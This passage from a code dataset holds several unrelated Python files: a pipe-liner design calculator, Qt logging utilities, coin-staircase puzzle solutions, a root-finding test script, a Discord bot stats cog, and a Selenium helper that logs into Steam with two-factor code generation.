vardict[key]\n \n #vardict = tempvardict\n \n for key, value in vardict.items():\n try:\n float(vardict[key])\n vardict[key] = float(vardict[key])\n except:\n vardict[key] = vardict[key]\n \n self.vardict = vardict\n \n # Calculated variables\n self.vardict['soil_depth'] = (vardict['surface_to_invert']\n -(vardict['host_diameter'])/12)\n self.vardict['gw_head'] = (vardict['surface_to_invert']\n - vardict['gw_level'])\n if self.vardict['gw_head'] <= 0:\n self.vardict['gw_head'] = 0\n self.vardict['ov_red_fact'] = (((1-(vardict['ovality']/100))/((1+(\n vardict['ovality']/100))**2))**3)\n self.vardict['lng_term_modulus'] = ((vardict['ret_factor']/100)\n *vardict['design_modulus'])\n self.vardict['lng_term_flex_strength'] = (\n (vardict['ret_factor']/100)\n *vardict['design_flexural_strength'])\n self.vardict['gw_load'] = self.vardict['gw_head']/2.31\n\n \n def x1p1(self):\n '''X1.1 - Partially deteriorated gravity pipe condition support\n hydraulic load of groundwater'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n ef = self.vardict['enhancement_factor']\n mod = self.vardict['lng_term_modulus']\n oval = self.vardict['ov_red_fact']\n mu = self.vardict['poissons']\n FS = self.vardict['safety_factor']\n gwload = self.vardict['gw_load']\n \n # Calculate\n sdr = (((2*ef*mod*oval)/((1-(mu**2))*gwload*FS))**(1.0/3.0))\n liner_thickness_x1p1 = dia/sdr\n return liner_thickness_x1p1\n\n def x1p2(self):\n '''X1.2 - If there is no groundwater above the pipe, the CIPP should \n have a maximum SDR of 100'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter'] \n gwhead = self.vardict['gw_head']\n \n # Calculate\n if (gwhead <= 0):\n liner_thickness_x1p2 = dia/100\n return liner_thickness_x1p2\n else:\n return 0\n\n def x1p2p1p1(self):\n '''X1.2.1.1 - if the original pipe is oval, the design from X1.1 shall\n have a minimum thickness as calculated by:'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter'] \n oval = self.vardict['ov_red_fact']\n flex = self.vardict['lng_term_flex_strength']\n FS = self.vardict['safety_factor']\n gwload = self.vardict['gw_load']\n \n # Calculate\n pythag_A = (1.5*(oval/100))*(1+(oval/100))\n 
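        # Added commentary, not in the original source: the surrounding lines
        # solve the quadratic A*SDR**2 + B*SDR + C = 0 for the standard
        # dimension ratio via the quadratic formula, replace any negative root
        # with the sentinel 999, keep the smaller admissible root, and convert
        # back to a wall thickness as t = D / SDR.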
pythag_B = (-0.5*(1+((oval/100))))\n pythag_C = -flex/(gwload*FS)\n root_1 = (-pythag_B+((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n root_2 = (-pythag_B-((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n if (root_1 < 0):\n root_1 = 999\n if (root_2 < 0):\n root_2 = 999\n root = min(root_1, root_2)\n liner_thickness_x1p2p1p1 = dia/root\n return liner_thickness_x1p2p1p1\n\n \n\n \"\"\" For non-standard live loads, or concentrated load, use eq. and impact factors.\n Load eq.\n Pp = 3*Ps / 2*pi*(C^2)*((1+((d/c)^2))^2.5)\n Pp = pressure transmitted to pipe\n Ps = Load at surface (lbs)\n C = depth of cover (in for psi, ft for psf)\n d = horiz. offset distance from pipe to line of application of surface load (in for psi, ft for psf)\n\n #Impact factor - if less than x, y. If over x>3 use y4.\n imp_fact_hwy = { 1:1.5, 2:1.35, 3:1.15, 100:1.0 }\n imp_fact_rail = { 1:1.75, 2:1.5, 3:1.5, 100:1.35 }\n imp_fact_arpt = { 1:1.5, 2:1.35, 3:1.35, 100:1.15 }\n\n # Triggers for specialized investigation if load area > 10 sq ft and:\n # 500 psf for pre-1941 pipelines\n # 1000 psf for 12-inch diameter or larger\n # 1500 psf for pipelines smaller than 12-inch dia\n \"\"\"\n\n def live_load_determination(self):\n ''' X1.2.2 - Fully deteriorated gravity pipe. Designed to support hydraulic, soil, and live loads.\n Live load calculation method must be determined\n Standard using AASHTO charts'''\n # Pull variables from dictionary\n location = self.vardict['location']\n depth = self.vardict['soil_depth']\n\n # Determine Live Load\n if (location == 'Highway'):\n if (depth >= 10):\n live_load = 0\n elif (depth >8 and depth < 10):\n live_load = 0.69\n elif (depth < 2):\n live_load = 5.56\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_hwy[live_load_index]\n elif (location == 'Rail'):\n if (depth > 30):\n live_load = 0\n elif (depth >8 and depth <= 30):\n live_load_index = 2*trunc(0.5*depth)\n live_load = self.live_load_rail[live_load_index]\n elif (depth < 2):\n live_load = 26.39\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_rail[live_load_index]\n elif (location == 'Airport'):\n if (depth > 24):\n live_load = 0\n elif (depth >8 and depth <= 24):\n live_load_index = 2*trunc(0.5*depth)\n live_load = self.live_load_arpt[live_load_index]\n elif (depth < 2):\n live_load = 13.14\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_arpt[live_load_index]\n else:\n live_load = None\n return live_load\n\n def x1p2p2(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n gwhead = self.vardict['gw_head']\n depth = self.vardict['soil_depth']\n W = self.vardict['soil_density']\n FS = self.vardict['safety_factor']\n smod = self.vardict['soil_mod']\n oval = self.vardict['ov_red_fact']\n mod = self.vardict['lng_term_modulus']\n \n # Calculate\n adjusted_gwhead = gwhead - (dia/12)\n Rw_calc = 1.0-(0.33*(adjusted_gwhead/depth))\n Rw_min = 0.67\n Rw_max = 1.0\n Rw = min(Rw_calc, Rw_min)\n Rw = Rw_max if Rw > Rw_max else Rw #Water buoyancy factor\n Qt = ((0.433*adjusted_gwhead)+((W*depth*Rw)/144)\n +self.live_load_determination())\n B_prime = 1/(1+(4*(exp(-0.065*depth)))) #Coef of elastic support\n mom_inert = ((dia**3)*((FS*Qt)**2))/(32*Rw*B_prime*smod*oval*mod)\n liner_thickness_x1p2p2 = (12*mom_inert)**(1/3)\n return liner_thickness_x1p2p2\n\n def x1p2p2p1(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n des_mod = self.vardict['design_modulus']\n \n # Calculate\n mom_inert_min = 
(0.093*(dia**3))/des_mod\n liner_thickness_x1p2p2p1 = (12.0*mom_inert_min)**(1/3)\n return liner_thickness_x1p2p2p1 \n \n def thickness_formater(self): #formatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n thickness = self.thickness_calc()\n \n # Format\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n liner_thickness = 'No hydraulic loading, design as fully deteriorated or use minimum thickness.'\n else:\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n else:\n liner_thickness = 'error'\n \n return liner_thickness\n \n def thickness_calc(self): #unformatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n\n # Calculate\n if (condition == 'Partially Deteriorated'):\n if gwload <= 0:\n liner_thickness = 0\n else:\n liner_thickness = max(self.x1p1(), self.x1p2(), self.x1p2p1p1()) #output is in inches\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = max(self.x1p2p2(), self.x1p2p2p1()) #output is in inches\n\n return liner_thickness\n \n def flow_change(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n liner_t = self.thickness_calc()\n n_host = self.vardict['n_host']\n n_liner = self.vardict['n_liner']\n gwload = self.vardict['gw_load']\n condition = self.vardict['design_condition']\n \n #Calculate\n coeff = 0.608173 #For flow at pipe 2/3 full (design flow level)\n r_host = dia/2\n r_lined = (dia/2)-liner_t\n # First check if liner thickness reduces diameter to zero\n if r_lined <= 0:\n return -100\n else:\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n deltaQ_pct = 0.0\n return deltaQ_pct\n else:\n A_host = ((pi*r_host**2)*coeff)+(r_host/3)*((((r_host)**2)-((r_host/3)**2))**(0.5))\n pw_host = (2*pi*r_host)*coeff\n A_lined = ((pi*r_lined**2)*coeff)+(r_lined/3)*((((r_lined)**2)-((r_lined/3)**2))**(0.5))\n pw_lined = (2*pi*r_lined)*coeff\n slope = 0.102\n hyd_rad_host = A_host/pw_host\n hyd_rad_lined = A_lined/pw_lined\n q_host = (1.486/n_host)*A_host*(hyd_rad_host**(2/3))*(slope**(1/2))\n q_lined = (1.486/n_liner)*A_lined*(hyd_rad_lined**(2/3))*(slope**(1/2))\n deltaQ = q_lined - q_host\n deltaQ_pct = round((deltaQ/q_host) * 100)\n return deltaQ_pct\n \n def output_dict(self):\n # Convert input variables to nice format\n round_down_to0 = [\n 'design_modulus', 'design_flexural_strength', 'ret_factor',\n 'soil_density', 'soil_mod', 'host_age', 'host_diameter'\n ]\n round_down_to1 = [\n 'safety_factor', 'ovality', 'enhancement_factor', 'gw_level'\n ]\n round_down_to2 = ['poissons']\n round_down_to3 = ['n_host', 'n_liner']\n \n for i in round_down_to0:\n self.vardict[i] = round(self.vardict[i])\n for i in round_down_to1:\n self.vardict[i] = str('{0:.1f}'.format(round(self.vardict[i],1)))\n for i in round_down_to2:\n self.vardict[i] = str('{0:.2f}'.format(round(self.vardict[i],2)))\n for i in round_down_to3:\n self.vardict[i] = str('{0:.3f}'.format(round(self.vardict[i],3)))\n \n # Future - send out for calculations of flow reduction, add to dict\n \n return self.vardict\n\n \n\ndef LM_run(input):\n lm = LinerManager(input)\n thickness = lm.thickness_formater()\n flow_change = lm.flow_change()\n output_dict = lm.output_dict()\n return(thickness, flow_change, 
output_dict)\n\n\n","sub_path":"cippcalc.py","file_name":"cippcalc.py","file_ext":"py","file_size_in_byte":13351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55438545","text":"### some qt utils\n\n#from PyQt5 import QtCore\n#from PyQt5.QtCore import QThread, QDateTime\nfrom PyQt5.QtCore import *\n\ndef mygettid():\n ### simple gettid like C's syscall(__NR_gettid)\n import ctypes\n import platform\n\n syscalls = {\n 'i386': 224, # unistd_32.h: #define __NR_gettid 224\n 'x86_64': 186, # unistd_64.h: #define __NR_gettid 186\n }\n libcs = {\n 'i386': '/lib/libc.so.6',\n 'x86_64': '/lib64/libc.so.6',\n }\n # libc = ctypes.CDLL(\"/lib/libc.so.6\")\n libc = ctypes.CDLL(libcs[platform.machine()])\n # tid = ctypes.CDLL('libc.so.6').syscall(224)\n return libc.syscall(syscalls[platform.machine()])\n\n### in msgh: 0 aaaaaaaaa\ndef qt_debug_handler(tp, ctx, msg):\n #print(\"in msgh:\", tp, ctx, msg)\n #print(ctx.function, ctx.file, ctx.line)\n\n tid = QThread.currentThreadId() ### voidstr type\n tid = mygettid()\n tid = str(tid).encode('utf8')\n \n now = QDateTime.currentDateTime()\n tmstr = now.toString(\"yyyy-MM-dd hh:mm:ss\")\n tmstr = tmstr.encode('utf8')\n\n fn = b''\n try:\n if ctx.file is None: # for qt internal msg\n fn = b'qtinternal'\n else:\n fn = ctx.file.encode('utf-8')\n fnl = ctx.file.split('/')\n fn = fnl[len(fnl)-1].encode('utf8')\n except:\n fn = b'errfh'\n\n line = str(ctx.line).encode('utf8')\n function = b''\n try:\n if type(ctx.function) == str:\n function = ctx.function.encode('utf8')\n elif type(ctx.function) == bytes:\n # function = ctx.function.decode('utf8')\n function = ctx.function\n else: function = str(ctx.function).encode('utf8')\n except Exception as ex:\n # print(b'EEE:' + bytes(ctx.function, 'utf8'))\n print('EEE: ctx.function: %s' % str(ctx))\n\n if function == b'': function = b'qtinternal'\n # if ctx.function == None: function = b'qtinternal' # maybe UnicodeDecodeError:\n \n flog = b\"[\" + tmstr + b\"] T(\" + tid + b\") \" + fn + b\":\" + line + b\" \" + function \\\n + b\" -- \" + msg.encode('utf8')\n print(flog.decode('utf8'), flush=True)\n\n#usage\n# qInstallMessageHandler(qt_debug_handler)\n# qDebug('奇点'.encode()), but not qDebug('奇点')\n\n\n###\n### TODO improve qDebug() function\n### 多参数类型的qDebug\n### 并且能够用上qt的 debug handler\n### 不过这样不能正确获取调用栈信息了,还是不能用啊。\ndef qxDebug(*args):\n s = ''\n for arg in args:\n s += str(arg) + ' '\n qDebug(s)\n\n#####\nimport sys, time\nimport signal\n# from PyQt5.QtWidgets import qApp\nfrom PyQt5.QtCore import QCoreApplication\n\n### 必须与qt的timeout同时才能生效。\ndef sigint_handler(a0, a1):\n qApp = QCoreApplication.instance()\n print(\"SIGINT catched:\", a0, a1, qApp)\n qApp.quit()\n sys.exit(0)\n\ndef pytimeout():\n time.sleep(0.0000001)\n\nctrl_timer = None\ndef pyctrl():\n qInstallMessageHandler(qt_debug_handler)\n qApp = QCoreApplication.instance()\n ctrl_timer = QTimer(qApp)\n ctrl_timer.timeout.connect(pytimeout)\n ctrl_timer.start(100)\n \n signal.signal(signal.SIGINT, sigint_handler)\n \n","sub_path":"wxagent/qtutil.py","file_name":"qtutil.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88735956","text":"\"\"\"\nYou have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.\n\nGiven n, find the total number of full staircase rows that can be formed.\n\nn is a non-negative integer and fits within the range of a 32-bit 
signed integer.\n\nExample 1:\n\nn = 5\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤\n\nBecause the 3rd row is incomplete, we return 2.\nExample 2:\n\nn = 8\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤ ¤\n¤ ¤\n\nBecause the 4th row is incomplete, we return 3.\n\"\"\"\n\nclass Solution(object):\n    def arrangeCoins(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: int\n        \"\"\"\n        row = 1\n        while True:\n            if row*(row+1) > 2*n:\n                return row - 1\n            else:\n                row += 1\n        \n# top solution O(1)\n# 1 + 2 + 3 + 4 + 5 + 6 + 7 + ... + x <= n\n# (x * (x + 1)) / 2 <= n\n# a = 1, b = 1, c = -2*n\n# x = (-1 + sqrt(1 - 4*1*(-2*n))) / 2\n# simplify: x = (-1 + sqrt(1 + 8.0*n)) / 2 \nimport math\nclass Solution(object):\n    def arrangeCoins(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: int\n        \"\"\"\n        return int((-1 + math.sqrt(1 + 8*n)) // 2) \n    \n# top solution \n# binary search O(logn)\nclass Solution(object):\n    def arrangeCoins(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: int\n        \"\"\"\n        start, end = 0, n\n        while start <= end:\n            mid = start + (end - start) // 2\n            if mid * (mid + 1) <= 2 * n:\n                start = mid + 1\n            else:\n                end = mid - 1\n        return int(start - 1)","sub_path":"math/441.ArrangingCoins.py","file_name":"441.ArrangingCoins.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"48871130","text":"a = input(\"Enter:\")\n\nb = 0  # menu choice; stays 0 (no file handled) unless the greeting matches\nif a == 'Hello':\n    print('1 -google_kz.txt 2-google_paris.txt 3-google_uar.txt')\n    b = int(input())\nif b == 1:\n    myfile1 = open('google_kz.txt', 'w')\n    print(\"Name of a file is: \", myfile1.name)\n    myfile1.write(input())\n    print(myfile1)\n    myfile1.close()\nelif b == 2:\n    myfile2 = open('google_paris.txt', 'w')\n    print(\"Name of a file is: \", myfile2.name)\n    myfile2.write(input())\n    print(myfile2)\n    myfile2.close()\nelif b == 3:\n    myfile3 = open('google_uar.txt', 'w')\n    print(\"Name of a file is: \", myfile3.name)\n    myfile3.write(input())\n    print(myfile3)\n    myfile3.close()  # myfile3 only exists when b == 3, so it is closed inside the branch","sub_path":"part2_task17.py","file_name":"part2_task17.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"259204877","text":"\"\"\"Module which contains the information required about the aircraft\"\"\"\n\naircraft_data = {\n    \"air_conditions_and_anti_icing_coefficient\": 1.0,\n    \"brake_material\": \"composites\", # (composites, metal)\n    \"capture_area_per_inlet\": 1.0,\n    \"duct_material_factor\": 1.0,\n    \"duct_shape_factor\": 1.0,\n    \"duct_type\": 1.0,\n    \"energy_absorption_required\": 1.0,\n    \"engine_control_engine_type_coefficient\": 1.0,\n    \"engine_weight\": 1.0,\n    \"engine_type\": \"turbojet\", # (turbofan, turbojet, turboprop, reciprocating)\n    \"fuel_system_type\": \"both\", # (self, non, both)\n    \"fuselage_length\": 1.0,\n    \"htp_total_planform_area\": 1.0,\n    \"htp_thickness_at_root\": 1.0,\n    \"htp_span\": 1.0,\n    \"inlet_factor\": 1.0,\n    \"instruments\": 1.0,\n    \"is_dump_and_drain\": True,\n    \"is_engine_wing_or_body_mounted\": \"wing\",\n    \"is_full_round_spike_intake\": False,\n    \"is_gravity_control\": True,\n    \"is_half_spike_intake\": False,\n    \"is_in_flight_refuel\": False,\n    \"is_internal_engines\": False,\n    \"is_turbofan\": False,\n    \"is_turbojet\": True,\n    \"is_variable_engine_intake\": False,\n    \"leading_edge_sweep\": 1.0,\n    \"maximum_dynamic_pressure\": 1.0,\n    \"maximum_fuselage_height\": 1.0,\n    \"maximum_sea_level_mach_number\": 1.0,\n    \"maximum_thickness_ratio\": 1.0,\n    \"maximum_static_pressure_at_engine_compressor_face\": 1.0,\n    
\"number_of_attendants\": 1.0,\n \"number_of_crew\": 1.0,\n \"number_of_crew_bunks\": 1.0,\n \"number_of_engines\": 1.0,\n \"number_of_flight_deck_stations\": 1.0,\n \"number_of_inlets\": 1.0,\n \"number_of_passengers\": 1.0,\n \"number_of_pilots\": 1.0,\n \"preload_provision\": 1.0,\n \"pressurized_volume\": 1.0,\n \"ramp_length_forward_of_throat_per_inlet\": 1.0,\n \"ratio_of_htp_height_to_vtp_height\": 1.0,\n \"rudder_area\": 1.0,\n \"sandwich_ratio\": 1.0,\n \"starter_type\": \"electrical\", # (electrical, pneumatic, cartridge) - value dependent on engine type, see docs\n \"subsonic_duct_length_per_inlet\": 1.0,\n \"surface_control_coefficient\": 1.0,\n \"sweep_at_half_chord\": 1.0,\n \"tail_moment_arm\": 1.0,\n \"takeoff_weight\": 1.0,\n \"taper_ratio\": 1.0,\n \"temperature_correction_factor\": 1.0,\n \"thickness_of_htp_root\": 1.0,\n \"toilet_ratio\": 1.0,\n \"total_fuselage_fuel\": 1.0,\n \"total_surface_control_area\": 1.0,\n \"total_wing_fuel\": 1.0,\n \"ultimate_cabin_pressure\": 1.0,\n \"ultimate_load_factor\": 1.0,\n \"vtp_area\": 1.0,\n \"vtp_aspect_ratio\": 1.0,\n \"vtp_quarter_chord_sweep\": 1.0,\n \"vtp_taper_ratio\": 1.0,\n \"weight_of_electronics_system\": 1.0,\n \"weight_of_engine\": 1.0,\n \"weight_of_fuel_system\": 1.0,\n \"wing_area\": 1.0,\n \"wing_aspect_ratio\": 1.0,\n \"wing_mac\": 1.0,\n \"wing_span\": 1.0,\n \"wing_variable_sweep_structural_factor\": 1.0\n}\n","sub_path":"performance/mass_estimation/old/nicolai/aircraft_info.py","file_name":"aircraft_info.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"543499561","text":"# Put here for ease of use with statcord\nfrom discord.ext import commands\nfrom bot_config import OWNER_ID\nimport statcord\nimport os\nimport dbl\nfrom pprint import pprint\n\n\nSTATCORD_TOKEN = os.getenv(\"STATCORD_TOKEN\")\nTOP_TOKEN = os.getenv(\"TOP_TOKEN\")\nTOP_AUTH = os.getenv(\"TOP_HOOK_AUTH\")\n\n\nclass StatcordPost(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.key = STATCORD_TOKEN\n self.api = statcord.Client(self.bot, self.key)\n self.api.start_loop()\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n if str(ctx.message.author.id) == str(OWNER_ID):\n return\n self.api.command_run(ctx)\n\n\nclass TopGG(commands.Cog):\n \"\"\"Handles interactions with the top.gg API\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.token = TOP_TOKEN\n self.dblpy = dbl.DBLClient(\n self.bot, self.token, autopost=True,\n )\n # Autopost will post your guild count every 30 minutes\n\n async def on_guild_post():\n print(\"Posted to top.gg\")\n\n\ndef setup(bot):\n bot.add_cog(StatcordPost(bot))\n bot.add_cog(TopGG(bot))\n","sub_path":"cogs/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313453620","text":"#!/usr/bin/env python3\n\nimport math\nfrom scipy import optimize\nfrom sympy.abc import x\nfrom sympy import diff\nfrom sympy import lambdify\n\nfrom numerico.raizes.bisseccao import bisseccao\nfrom numerico.raizes.falsaposicao import falsaposicao\nfrom numerico.raizes.pontofixo import pontofixo1\nfrom numerico.raizes.pontofixo import pontofixo2\nfrom numerico.raizes.newtonraphson import newtonraphson\nfrom numerico.raizes.secante import secante\n\neps = 1e-15\n\n\ndef f1(x):\n \"\"\"x * log(x) - 1\"\"\"\n return x * math.log(x) - 1\n\n\ndef f2(x):\n \"\"\"x**3 - 9*x + 3\"\"\"\n 
return x**3 - 9 * x + 3\n\n\ndef phi(x):\n    \"\"\"x**3/9 + 1/3\"\"\"\n    return x**3 / 9 + 1 / 3\n\n\ndef f3(x):\n    \"\"\"sin(x)\"\"\"\n    return math.sin(x)\n\n\ndef main():\n    print('\\n', f1.__doc__)\n    f1raiz1 = bisseccao(f1, intervalo=[1, 10])\n    f1raiz2 = falsaposicao(f1, intervalo=[1, 10])\n    f1raiz4 = pontofixo2(f1, x0=2.6)\n    # This calculates the f1'\n    f1_ = lambdify(x, diff(f1.__doc__))\n    f1raiz6 = newtonraphson(f1, f1_, 2.6)\n\n    f1raiz7 = secante(f1, 1, 10)\n\n    print(\"Bisseccao\", f1raiz1, f1(f1raiz1))\n    print(\"FalsPosic\", f1raiz2, f1(f1raiz2))\n    print(\"PontoFix2\", f1raiz4)\n    print(\"NewtonRap\", f1raiz6, f1(f1raiz6))\n    print(\"Secante  \", f1raiz7, f1(f1raiz7))\n\n    print('\\n', f2.__doc__)\n    f2raiz1 = bisseccao(f2, intervalo=[-1, 1])\n    f2raiz2 = falsaposicao(f2, intervalo=[-1, 1])\n    f2raiz3 = pontofixo1(f2, phi, x0=0.3)\n    f2raiz4 = pontofixo2(f2, x0=0.3)\n\n    # This calculates the f2'\n    f2_ = lambdify(x, diff(f2.__doc__))\n\n    f2raiz6 = newtonraphson(f2, f2_, 0.3)\n    f2raiz7 = secante(f2, -1, 1)\n    f2raiz5 = optimize.brentq(f2, -1, 1)  # SciPy reference root for the SCIPYMPF print below\n    print(\"Bisseccao\", f2raiz1, f2(f2raiz1))\n    print(\"FalsPosic\", f2raiz2, f2(f2raiz2))\n    print(\"PontoFix1\", f2raiz3, f2(f2raiz3))\n    print(\"PontoFix2\", f2raiz4, f2(f2raiz4))\n    print(\"SCIPYMPF \", f2raiz5, f2(f2raiz5))\n    print(\"NewtonRap\", f2raiz6, f2(f2raiz6))\n    print(\"Secante  \", f2raiz7, f2(f2raiz7))\n\n    print('\\n', f3.__doc__)\n    f3raiz1 = bisseccao(f3, intervalo=[-1, 1], tol=eps)\n    f3raiz2 = falsaposicao(f3, intervalo=[-1, 1], xtol=eps, ytol=eps)\n    f3raiz4 = pontofixo2(f3, x0=0.1, tol=eps, maxiter=500)\n\n    # This calculates the f3'\n    f3_ = lambdify(x, diff(f3.__doc__))\n    f3raiz6 = newtonraphson(f3, f3_, 0.5)\n    f3raiz7 = secante(f3, -1, 1)\n\n    print(\"Bisseccao\", f3raiz1, f3(f3raiz1))\n    print(\"FalsPosic\", f3raiz2, f3(f3raiz2))\n    print(\"PontoFix2\", f3raiz4, f3(f3raiz4))\n    print(\"NewtonRap\", f3raiz6, f3(f3raiz6))\n    print(\"Secante  \", f3raiz7, f3(f3raiz7))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"numerico/raiz/testes/raizes.py","file_name":"raizes.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"433476908","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n#\n# @AUTHOR: Rabbir\n# @FILE: \\rab_python_packages\\rab_steam.py\n# @DATE: 2021/02/03 Wed\n# @TIME: 17:18:46\n#\n# @DESCRIPTION: 共通 Steam 模块(操作基本基于 Selenium)\n\n\nimport hmac\nimport time\nimport base64\nimport struct\nimport selenium\nfrom hashlib import sha1\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom rab_python_packages import rab_logging\n\n\n# 日志记录\nrab_steam_logger = rab_logging.build_rab_logger()\n\n\n\"\"\"\n@description: r_steam 类\n-------\n@param:\n-------\n@return:\n\"\"\"\nclass r_steam:\n\n    \"\"\"\n    @description: 初始化\n    -------\n    @param:\n    -------\n    @return:\n    \"\"\"\n    def __init__(self, driver, username, password, token_flg=False, \\\n        shared_secret=None, identity_secret=None):\n        self.driver = driver\n        self.username = username\n        self.password = password\n        # 令牌标识\n        self.token_flg = token_flg\n        # 令牌分享码\n        self.shared_secret = shared_secret\n        self.identity_secret = identity_secret\n\n    \"\"\"\n    @description: 切换至 Steam 登录窗口\n    -------\n    @param:\n    -------\n    @return:\n    \"\"\"\n    def switch_to_steam_login_window(self, exclude_field):\n        success_flg = False\n        for window_handle in self.driver.window_handles:\n            self.driver.switch_to.window(window_handle)\n            # 判断不包含排除字段但是包含 STEAM 
字段的窗口即为 STEAM 登录窗口\n if (exclude_field.lower() not in str(self.driver.title).lower()\n and \"steam\" in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n \n \"\"\"\n @description: 切换回原窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def switch_to_origin_window(self, fill_field):\n success_flg = False\n for window_handle in self.driver.window_handles:\n self.driver.switch_to.window(window_handle)\n # 包含满足要求字段的窗口即为原窗口\n if (fill_field.lower() in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n\n \"\"\"\n @description: 生成 STEAM 登录一次性令牌\n -------\n @param:\n -------\n @return:\n \"\"\"\n def generate_one_time_code(self):\n timestamp = int(time.time())\n time_buffer = struct.pack(\">Q\", timestamp//30)\n time_hmac = hmac.new(base64.b64decode(self.shared_secret),\n time_buffer,\n digestmod=sha1).digest()\n begin = ord(time_hmac[19:20]) & 0xf\n full_code = struct.unpack(\">I\",\n time_hmac[begin:begin+4])[0] & 0x7fffffff\n chars = \"23456789BCDFGHJKMNPQRTVWXY\"\n code = \"\"\n for j in range(5):\n full_code, i = divmod(full_code, len(chars))\n code += chars[i]\n return code\n\n \"\"\"\n @description: 在 STEAM 登录界面实现登录\n -------\n @param:\n -------\n @return:\n \"\"\"\n def do_steam_login(self):\n try:\n # 等待登录按钮出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='imageLogin']\")))\n # 检查是否已经登录\n try:\n time.sleep(1)\n # 如果有当前账户名说明已经登录完成了\n account_div = self.driver.find_element_by_class_name(\n \"OpenID_loggedInAccount\")\n logined_flg = True\n except Exception as e:\n logined_flg = False\n # 登录的情况下进行登出操作\n if (logined_flg):\n print(\"Steam 当前已经处于登录状态,尝试登出...\")\n # 选择登出这个账号\n logout_div_a = self.driver.find_element_by_xpath(\n \"//div[@class='OpenID_Logout']/a\")\n logout_div_a.click()\n # STEAM 用户名输入框\n steam_account_name_input = self.driver \\\n .find_element_by_id(\"steamAccountName\")\n # STEAM 密码输入框\n steam_password_input = self.driver \\\n .find_element_by_id(\"steamPassword\")\n # 输入用户名和密码\n steam_account_name_input.send_keys(self.username)\n steam_password_input.send_keys(self.password)\n # 点击登录按钮\n self.driver.find_element_by_id(\"imageLogin\").click()\n # 无令牌的情况下或者当前已经是登录状态就算登录成功\n if (not self.token_flg):\n return True\n else:\n # 等待需要令牌的弹窗出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='twofactorcode_entry']\")))\n twofactorcode_entry_input = self.driver.find_element_by_id(\n \"twofactorcode_entry\")\n # 等待三秒弹窗可见后,生成并输入令牌\n time.sleep(3)\n twofactorcode_entry_input.send_keys(\n self.generate_one_time_code())\n # 提交按钮\n submit_btn = self.driver.find_element_by_xpath(\n \"//div[@id='login_twofactorauth_buttonset_entercode']/div\")\n submit_btn.click()\n return True\n except Exception as e:\n # 登录失败\n rab_steam_logger.error(\"Steam 登录界面操作出错!错误信息:\" + str(e))\n return False\n\n \"\"\"\n @description: 等待 Steam 登录成功并自动关闭窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def wait_steam_login_success(self, fill_field):\n for i in range(0, 10):\n if (len(self.driver.window_handles) == 1\n and fill_field.lower() in str(self.driver.title).lower()):\n return True\n else:\n time.sleep(2)\n continue\n return False\n\n\n\"\"\"\n@description: 单体测试\n-------\n@param:\n-------\n@return:\n\"\"\"\nif __name__ == \"__main__\":\n 
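    # Added demo, not in the original module: generate_one_time_code() is
    # Steam's TOTP variant -- HMAC-SHA1 over the big-endian 30-second counter,
    # RFC 4226-style dynamic truncation, then five symbols from a 26-character
    # alphabet. The secret below is a made-up base64 value used purely for an
    # offline smoke test.
    _demo = r_steam(driver=None, username='', password='', token_flg=True,
                    shared_secret=base64.b64encode(b'0123456789abcdefghij').decode())
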